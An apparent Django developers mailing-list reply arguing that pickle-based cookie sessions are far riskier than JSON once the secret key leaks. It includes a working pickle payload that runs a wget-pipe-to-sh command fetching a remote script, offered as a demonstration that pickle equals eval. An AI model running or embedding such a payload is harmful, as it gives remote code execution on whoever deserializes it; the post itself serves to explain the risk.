> JSON backend didn't allow serialization of arbitrary data, as such it was > different to all the other backends which do allow it -- which means this > backend isn't a dropin replacement.
Yeah, I agree. The cookie-based backend is already a bit "special", since it is functionally limited to around 4k. > P.S.: Btw, if you leak your secret key, you can get an admin user with a > json backend too, while not being remote code execution it's still something > I would consider as catastrophic as code execution in most of my projects. No. It's far less catastrophic. It just means I'm a Django admin and can trash that project (which you can then restore from the backups). I can't own all your other Django projects on the same machine, steal your deploy keys, root your server, and then configure it to attack your dev machine when you SSH into it to see why weird things are happening. Remote code execution is BAD. > Oh and I know I am moving to thin ice now, but I'd still like to know: To my > understanding pickle doesn't necessarily allow arbitrary code execution, I <snip> > like to understand how such an attack would look like -- so I would > appreciate if you could give a more or less concrete example I should not have skipped that demo during my Djangocon talk. Since you asked nicely... try this: data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'" import pickle; pickle.loads(data) And then open a new bash window. Obviously that payload could be a whole lot more malicious. A rootkit and a reverse shell would be traditional. As I said in the talk, pickle == eval. Don't use pickle where you wouldn't use eval. You can look at how the pickle works by running: import pickletools; print pickletools.dis(data) Hopefully that example was more or less concrete enough for you. ;) -Paul -- You received this message because you are subscribed to the Google Groups "Django developers" group. To post to this group, send email to django-developers@googlegroups.com. To unsubscribe from this group, send email to django-developers+unsubscr...@googlegroups.com. For more options, visit this group at http://groups.google.com/group/django-developers?hl=en.
